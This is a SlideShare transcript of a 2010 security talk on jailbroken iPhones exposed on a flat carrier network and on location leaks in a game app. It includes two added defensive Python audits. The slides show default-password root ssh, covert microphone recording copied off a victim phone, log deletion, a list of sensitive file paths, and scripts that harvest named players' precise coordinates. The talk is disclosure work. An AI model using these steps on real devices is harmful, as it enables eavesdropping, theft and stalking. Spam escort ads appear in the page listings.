The New World of Smartphone Security
What Your iPhone Disclosed About You



                 Trevor Hawthorn
                 Managing Partner


Friday, July 9, 2010
Today’s Talk


                          “Pockets full of shells”




Today’s Talk


                                  “I can see you
                                 from my house”




Who I am now




Old Smartphone Best
                            Practices

                                      = Bad


                               = Good

New Smartphone Best
                            Practices

            1. IT will use the iPhone Configuration
               Utility so you can talk to Exchange, use
               the VPN, wireless, etc.
            2. Get iFart, it’s hilarious.




If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my AT&T wireless service

                           •   Feel that I have fantastic coverage everywhere I go at
                               all times

                           •   Am sure you have the largest/fastest 3G network,
                               regardless of what VZW says

                           •   Looking forward to years of receiving quality service
                               from you

                           •   Would love to chat

Jailbreaking

                       blackra1n



                       pwnagetool




It opens up a whole new world
                            of applications

           •       common Unix
                   binaries

           •       sshd

           •       tethering

           •       pirate software

           •       super easy to JB your
                   phone




Impact on security

                       “Jail breaking removes 80% of the
                       iPhone’s security precautions”
                       Charlie Miller, SyScan 2009




How many iPhones are
                           jailbroken?


6.93%




                       [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore



Global Stats




ifconfig
             root# ifconfig

             lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384

                       inet 127.0.0.1 netmask 0xff000000

             en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500

                       ether 00:21:e9:09:e3:4f

             pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

                       inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff

             pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

             pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

             pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

             en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500

                       inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255

                       ether 0a:0b:ad:0b:ab:e0


Interfaces
                       en0 = 802.11 interface
                       pdp_ip0 = primary cellular interface on APN:
                       wap.cingular
                       pdp_ip1 = activates when retrieving visual
                       voicemail on APN: acds.voicemail
                       pdp_ip2 = not sure
                       pdp_ip3 = used with tethering



ifconfig

              pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST>
              mtu 1450
                    inet 10.69.62.220 --> 10.69.62.220 netmask
              0xffffffff




sshd




So what?



Until (about) October 16, 2009 AT&T did
                    not filter device to device IP network
                                    traffic.




AT&T’s Network
                       Most people think it looks like this:




                            /32



AT&T’s Network
                           Actually, more like this:




                       Multiple /16’s


Your smartphone (and laptop/
           blackberry, etc.) has been on one giant
                        flat network...




So I started looking around...




Devices On the Network
                           10,589* IPs scanned


                       Count      Port           What?
                        83        22          sshd
                        24        80          http
                         4       2008        PDANet
                       3,644     62078     iPhone Default


Other stuff out there

                       • Saw a Linux box with sshd
                       • Windows Mobile devices
                       • Blackberries
                       • Windows PCs
                       • PDANet for the iPhone is an open proxy.

ssh access between phones

                        Trevors-iPhone:~ root# ssh root@10.69.62.100

                        Password: [alpine]

                        Nates-iPhone:~ root#

                        Nates-iPhone:~ root# id

                        uid=0(root) gid=0(wheel) groups=0(wheel),1
                        (daemon),2(kmem),3(sys),4(tty),5(operator),8
                        (procview),9(procmod),20(staff),29
                        (certusers),80(admin)



Filesystem Guide

                  Interesting stuff:

           /private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)
           /private/var/mobile/Library/SMS - SMS Text Messages
           /private/var/mobile/Library/Voicemail - Voicemail in .amr format
           /private/var/mobile/Library/AddressBook - Contacts
           /private/var/mobile/Library/CallHistory - Call History
           /private/var/mobile/Library/Notes - Notes




/private/var/mobile/Library/CallHistory/call_history.db
                 /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
                 /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
                 /private/var/mobile/Library/Cookies/Cookies.plist
                 /private/var/mobile/Library/Keyboard/dynamic-text.dat
                 /private/var/mobile/Library/Mail/Accounts.plist
                 /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
                 /private/var/mobile/Library/Mail/(mail account name)/Sent Messages
                 /private/var/mobile/Library/Mail/(mail account name)/INBOX
                 /private/var/mobile/Library/Maps/History.plist
                 /private/var/mobile/Library/YouTube/Bookmarks.plist
                 /private/var/mobile/Library/Voicemail/(amr files)
                 /private/var/mobile/Library/Voicemail/voicemail.db
                 /private/var/mobile/Library/Safari/Bookmarks.plist
                 /private/var/mobile/Library/Safari/History.plist
                 /private/var/mobile/Library/Suspend.plist
                 /private/var/mobile/Library/Safari/SuspendState.plist
                 /private/var/mobile/Library/Safari/SMS/sms.db
                 /private/var/mobile/Library/Preference/(various preference Plists)
                 /private/var/mobile/Library/Notes/notes.db




Let’s do a bit more
                       Erica Utilities - cmd line utilities for the iPhone

                       recAudio    recAudio: Record audio from the onboard microphone.

                       findme      Queries the iPhone’s GPS API to return latitude/longitude



Attacker                    Victim


                                      recAudio


                                      scp/ssh


                                  recording.aiff



                       10.69.62.220                10.69.62.100



I can hear you typing
                       Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
                       Password:
                       recAudio                                       100%   19KB
                       1.3KB/s     00:00
                       Trevors-iPhone:~ root# ssh root@10.69.62.100
                       Password:
                       Nates-iPhone:~ root# ./recAudio
                       Start talking. Press ^C to finish.
                       Starting recording
                       ^C
                       Interrupted.
                       Stopping recording




Nates-iPhone:~ root# ls -l *.aiff
               -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at
               22:35:04.aiff
               Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff
               Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .
               Password:
               test.aiff                                   100%   523KB    2.2KB/
               s   00:00
               Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
               Nates-iPhone:~ root# last


               wtmp begins at Fri Oct 2 22:41
               Nates-iPhone:~ root#




Other bad things
                       • ./openURL tel://1-900-XXX-XXX
                       • ./openURL tel://911 or tel://mynumber
                       • Pillage filesystem: email, sms, notes, app
                         data, etc.
                       • apt-get install tcpdump nmap
                       • go wild on whatever network en0 is
                         connected to.


Worms and Exploits



Dutch Extortion




                         November 2009
ikee Worm




                       November 2009
Exploits


                  • Phone/Privacy.A* command line tool
                  • Phone/iBotNet.A* worm with C&C
                       *Discovered by security firm Intego




Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I could not see friend in CA from DC

                           •   But I could see friend in Boston

                       •   No easy way to target specific individual (Identity to
                           AT&T NAT IP address not super easy)

                           •   No way to correlate 10.x.x.x IP to person via Safari

                           •   decloak.net doesn’t really work in Mobile Safari

                       •   Man this is slow...


email to ID user

                               <img src="http://10.69.62.220/i.jpg">

             10.69.63.220:80                                    10.69.63.110




                                        src:10.69.63.110
           10.69.63.220:80                                      10.69.63.110
                                        dst:10.69.63.220


What to do
                       •   Don’t Jailbreak your phone if you care about
                           security (sorry)
                       •   Change root and mobile users’ passwords
                       •   Attention Cydia Folks: Do not bind sshd to pdp
                           interfaces; force password change upon install
                       •   IT Folks: Policy on jailbroken iPhones
                       •   AT&T: Filter mobile to mobile IP traffic
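
The "do not bind sshd to pdp interfaces" recommendation can be checked on a device by comparing ifconfig output against the ListenAddress lines in sshd_config. The Python audit below is an added example, not part of the original slides; its function names are hypothetical and the sample input is constructed in the format of the ifconfig slide.

```python
import re

# Constructed sample, trimmed from the format shown on the ifconfig slide.
SAMPLE_IFCONFIG = """\
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
        ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
"""


def parse_ifconfig(text):
    """Return {interface: [IPv4 address, ...]} from BSD-style ifconfig output."""
    interfaces = {}
    current = None
    for line in text.splitlines():
        header = re.match(r"^(\S+): flags=", line)
        if header:
            current = header.group(1)
            interfaces[current] = []
            continue
        inet = re.match(r"^\s+inet (\d+(?:\.\d+){3})", line)
        if inet and current is not None:
            interfaces[current].append(inet.group(1))
    return interfaces


def listen_addresses(sshd_config):
    """Return the hosts named by ListenAddress lines.

    An empty list means sshd falls back to its default of listening on
    every local address.
    """
    hosts = []
    for raw in sshd_config.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0].lower() == "listenaddress":
            host = parts[1]
            if host.startswith("["):        # [address]:port form
                host = host[1:host.index("]")]
            elif host.count(":") == 1:      # IPv4-or-hostname:port form
                host = host.split(":", 1)[0]
            hosts.append(host)
    return hosts


def cellular_exposure(ifconfig_text, sshd_config, prefix="pdp_ip"):
    """Return sorted (interface, address) pairs on carrier-facing interfaces
    where sshd would accept connections under the given configuration."""
    listen = listen_addresses(sshd_config)
    wildcard = not listen or "0.0.0.0" in listen
    exposed = []
    for name, addrs in parse_ifconfig(ifconfig_text).items():
        if not name.startswith(prefix):
            continue
        for addr in addrs:
            if wildcard or addr in listen:
                exposed.append((name, addr))
    return sorted(exposed)


if __name__ == "__main__":
    # Constructed configurations: the default, and one pinned to the Wi-Fi side.
    for label, cfg in [("default", "Port 22\n"),
                       ("pinned", "ListenAddress 192.168.20.1\n")]:
        hits = cellular_exposure(SAMPLE_IFCONFIG, cfg)
        print(label, "->", hits if hits else "sshd not reachable on pdp interfaces")
```

An sshd_config with no ListenAddress line is reported as exposed on every addressed pdp interface, which is the state the slides describe.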



Privacy and Location
                            Based Apps



Location Based Apps
                       • Underworld: Sweet Deal
                       • Drug trafficking game with candy
                       • Location matters, move product from point
                         A to point B
                       • Phone sends high resolution coordinates to
                         game server


Like Druglords




Underworld: Sweetdeal




Google Maps




Paros

                       • Client side proxy
                       • Configure iPhone to use machine running
                         Paros’s IP address as proxy
                       • Watch what your apps send and receive


Request




Response




Used to monitor players




Let’s pick a non-intel agency
                                   player



                                              chezk



Request




Response




Lat/Lon to GMaps:




County Records




Facebook




Ok neat, what else?




Near real-time geolocation tracking of
                            players




cURL + perl + crontab = csv + gpsbabel =
     kml + Google Earth = EPIC screen shots




curl script
          #!/bin/sh
          #
          # First login...
          #
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -d @/home/trevor/iphone/login.xml \
               --dump-header /home/trevor/iphone/headers.txt \
               http://game.dl.a-steroids.com/TrafficServer/
          #
          # Then update location
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -b /home/trevor/iphone/headers.txt \
               -d @/home/trevor/iphone/update_loc.xml \
               http://game.dl.a-steroids.com/TrafficServer/
          #
          # Get GMap objects
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -b /home/trevor/iphone/headers.txt \
               -d @/home/trevor/iphone/gmap_update.xml \
               http://game.dl.a-steroids.com/TrafficServer/




perl script
               #!/usr/bin/perl

               use strict;
               use warnings;

               # make single or multiline input into one scalar
               my $glob = join('',(<>));

               # extract name-to-flag records
               my @records = $glob =~ /(<name>.*?<\/lon>)/ig;

               for (@records)
               {
                   # pull the player name and coordinates out of each record
                   my ($name,$lat,$lon) = $_ =~
                       qr|<name>(.*?)</name>.*?<lat>([-\d.]*)</lat><lon>([-\d.]*)</lon>|i;
                   print "$lat,$lon,$name\n";
               }




perl script output
                       39.93220206723633,-77.47186584472656,poppyseed
                       38.13753356933594,-77.06847380591797,Gadsden
                       39.98429718017578,-78.30014190673828,Ziggety
                       39.23520812988281,-77.40483581542969,Lexi
                       39.855418395996094,-77.2717056274414,Tatu
                       39.55705801582031,-77.4004086303711,Bigfoot
                       36.67790985107422,-77.5902328491211,Jeneko
                       38.297552490234375,-77.65829467773438,Stilbored
                       39.891050720214844,-77.55879211025781,Timoteo
                       39.66313247680664,-78.04374694824219,Gamber
                       36.295310314697266,-78.14061126700984,UnderWear
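
The output above shows the server handing every client other players' coordinates at full precision. One server-side mitigation is to snap coordinates to a coarse grid before they leave the server. The Python sketch below is an added example, not code from the slides or from the game. The `<name>`, `<lat>` and `<lon>` tags are the ones the perl script matches, while the `<player>` wrapper, the handles and the function names are assumptions.

```python
import math
import re

# Constructed response body; coordinates use the same precision as the
# perl script output, with placeholder handles.
SAMPLE_RESPONSE = (
    "<players>"
    "<player><name>player_one</name><lat>39.93220206723633</lat>"
    "<lon>-77.47186584472656</lon></player>"
    "<player><name>player_two</name><lat>38.13753356933594</lat>"
    "<lon>-77.06847380591797</lon></player>"
    "</players>"
)

KM_PER_DEGREE = 111.32  # approximate length of one degree of latitude

COORD = re.compile(r"<(lat|lon)>(-?\d+(?:\.\d+)?)</\1>", re.IGNORECASE)


def snap(value, places=1):
    """Snap a coordinate to the centre of its grid cell.

    The cell is 10**-places degrees wide. Using the cell centre (rather than
    adding random noise) means repeated queries return the same point, so an
    observer cannot average samples to recover the true position.
    """
    scale = 10 ** places
    return (math.floor(value * scale) + 0.5) / scale


def coarsen_response(xml, places=1):
    """Rewrite every <lat>/<lon> value in the response to its grid-cell centre."""
    def repl(match):
        tag, value = match.group(1), float(match.group(2))
        return "<{0}>{1:.{2}f}</{0}>".format(tag, snap(value, places), places + 1)
    return COORD.sub(repl, xml)


def max_error_km(lat_deg, places=1):
    """Approximate worst-case distance between a true position and the
    published cell centre (half the cell diagonal) at the given latitude."""
    half = 0.5 * 10 ** -places * KM_PER_DEGREE
    return math.hypot(half, half * math.cos(math.radians(lat_deg)))


if __name__ == "__main__":
    print(coarsen_response(SAMPLE_RESPONSE))
    print("worst-case error near 39.9N: %.1f km" % max_error_km(39.9))
```

With the default 0.1 degree cell, each published point can be several kilometres from the true position, which is enough for a game that only needs to know roughly which area a player is in.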




Comments/Feedback:
                       trevor.hawthorn@stratumsecurity.com
                            www.stratumsecurity.com
                                     Twitter:
                                 @packetwerks
                                @stratumsecurity


                            Special Thanks: Tiago Stock


Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

The New World of Smartphone Security

  • 1. The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
  • 2. Today’s Talk “Pockets full of shells”
  • 3. Today’s Talk “I can see you from my house”
  • 4. Who I am now
  • 5. Old Smartphone Best Practices = Bad = Good
  • 6. New Smartphone Best Practices 1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, it’s hilarious.
  • 7. If AT&T is in attendance:
  • 8. If AT&T is in attendance: • Facts about AT&T and me:
  • 9. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service
  • 10. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times
  • 11. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says
  • 12. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you
  • 13. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you • Would love to chat
  • 14. Jailbreaking blackra1n pwnagetool
  • 15. It opens up a whole new world of applications
  • 16. It opens up a whole new world of applications • common Unix binaries
  • 17. It opens up a whole new world of applications • common Unix binaries • sshd
  • 18. It opens up a whole new world of applications • common Unix binaries • sshd • tethering
  • 19. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software
  • 20. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software • super easy to JB your phone
  • 21. Impact on security “Jail breaking removes 80% of the iPhone’s security precautions” Charlie Miller, SyScan 2009
  • 22. How many iPhones are jailbroken?
  • 23. 6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
  • 25. ifconfig
        root# ifconfig
        lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
                inet 127.0.0.1 netmask 0xff000000
        en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
                ether 00:21:e9:09:e3:4f
        pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
                inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
        pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
        pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
        en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
                inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
                ether 0a:0b:ad:0b:ab:e0
  • 27. Interfaces: en0 = 802.11 interface
  • 28. Interfaces: en0 = 802.11 interface; pdp_ip0 = primary cellular interface on APN: wap.cingular
  • 29. Interfaces: en0 = 802.11 interface; pdp_ip0 = primary cellular interface on APN: wap.cingular; pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
  • 30. Interfaces: en0 = 802.11 interface; pdp_ip0 = primary cellular interface on APN: wap.cingular; pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail; pdp_ip2 = not sure
  • 31. Interfaces: en0 = 802.11 interface; pdp_ip0 = primary cellular interface on APN: wap.cingular; pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail; pdp_ip2 = not sure; pdp_ip3 = used with tethering
  • 32. ifconfig
        pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
                inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
  • 35. Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic.
  • 36. AT&T’s Network Most people think it looks like this: /32
  • 37. AT&T’s Network Actually, more like this: Multiple /16’s
  • 38. Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...
  • 39. So I started looking around...
  • 42. Devices On the Network
        10,589* IPs scanned
        Count   Port    What?
        83      22      sshd
        24      80      http
        4       2008    PDANet
        3,644   62078   iPhone Default
  • 43. Other stuff out there • Saw a Linux box with sshd • Windows Mobile devices • Blackberries • Windows PC’s • PDANet for the iPhone is an open proxy.
  • 45. ssh access between phones
        Trevors-iPhone:~ root# ssh root@10.69.62.100
        Password: [alpine]
        Nates-iPhone:~ root#
        Nates-iPhone:~ root# id
        uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
  • 46. Filesystem Guide
        Interesting stuff:
        /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.)
        /private/var/mobile/Library/SMS - SMS Text Messages
        /private/var/mobile/Library/Voicemail - Voicemail in .amr format
        /private/var/mobile/Library/AddressBook - Contacts
        /private/var/mobile/Library/CallHistory - Call History
        /private/var/mobile/Library/Notes - Notes
  • 47. /private/var/mobile/Library/CallHistory/call_history.db
        /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
        /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
        /private/var/mobile/Library/Cookies/Cookies.plist
        /private/var/mobile/Library/Keyboard/dynamic-text.dat
        /private/var/mobile/Library/Mail/Accounts.plist
        /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
        /private/var/mobile/Library/Mail/(mail account name)/Sent Messages
        /private/var/mobile/Library/Mail/(mail account name)/INBOX
        /private/var/mobile/Library/Maps/History.plist
        /private/var/mobile/Library/YouTube/Bookmarks.plist
        /private/var/mobile/Library/Voicemail/(amr files)
        /private/var/mobile/Library/Voicemail/voicemail.db
        /private/var/mobile/Library/Safari/Bookmarks.plist
        /private/var/mobile/Library/Safari/History.plist
        /private/var/mobile/Library/Suspend.plist
        /private/var/mobile/Library/Safari/SuspendState.plist
        /private/var/mobile/Library/Safari/SMS/sms.db
        /private/var/mobile/Library/Preference/(various preference Plists)
        /private/var/mobile/Library/Notes/notes.db
  • 48. Let’s do a bit more
        Erica Utilities - cmd line utilities for the iPhone
        recAudio: Record audio from the onboard microphone.
        findme: Queries the iPhone’s GPS API to return latitude/longitude
  • 49. [Diagram: Attacker 10.69.62.220, Victim 10.69.62.100; labels: recAudio, scp/ssh, recording.aiff]
  • 50. I can hear you typing
        Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
        Password:
        recAudio 100% 19KB 1.3KB/s 00:00
        Trevors-iPhone:~ root# ssh root@10.69.62.100
        Password:
        Nates-iPhone:~ root# ./recAudio
        Start talking. Press ^C to finish.
        Starting recording
        ^C Interrupted. Stopping recording
  • 51. Nates-iPhone:~ root# ls -l *.aiff
        -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff
        Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff
        Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .
        Password:
        test.aiff 100% 523KB 2.2KB/s 00:00
        Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
        Nates-iPhone:~ root# last
        wtmp begins at Fri Oct 2 22:41
        Nates-iPhone:~ root#
  • 52. Other bad things
  • 53. Other bad things • ./openURL tel://1-900-XXX-XXX
  • 54. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber
  • 55. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc.
  • 56. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap
  • 57. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap • go wild on whatever network en0 is connected to.
  • 59. Dutch Extortion November 2009
  • 60. ikee Worm November 2009
  • 61. Exploits • Phone/Privacy.A* command line tool • Phone/iBotNet.A* worm with C&C *Discovered by security firm Intego
  • 62. Some good news
  • 63. Some good news • AT&T does segment part of their network:
  • 64. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC
  • 65. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston
  • 66. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
  • 67. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari
  • 68. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari
  • 69. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari • Man this is slow...
  • 70. email to ID user: <img src="http://10.69.62.220/i.jpg"> [Diagram: 10.69.63.220:80 and 10.69.63.110; labels: src:10.69.63.110, dst:10.69.63.220]
  • 71. What to do • Don’t Jailbreak your phone if you care about security (sorry) • Change root and mobile users’ passwords • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install • IT Folks: Policy on jailbroken iPhones • AT&T: Filter mobile to mobile IP traffic
  • 72. Privacy and Location Based Apps
  • 74. Location Based Apps • Underworld: Sweet Deal
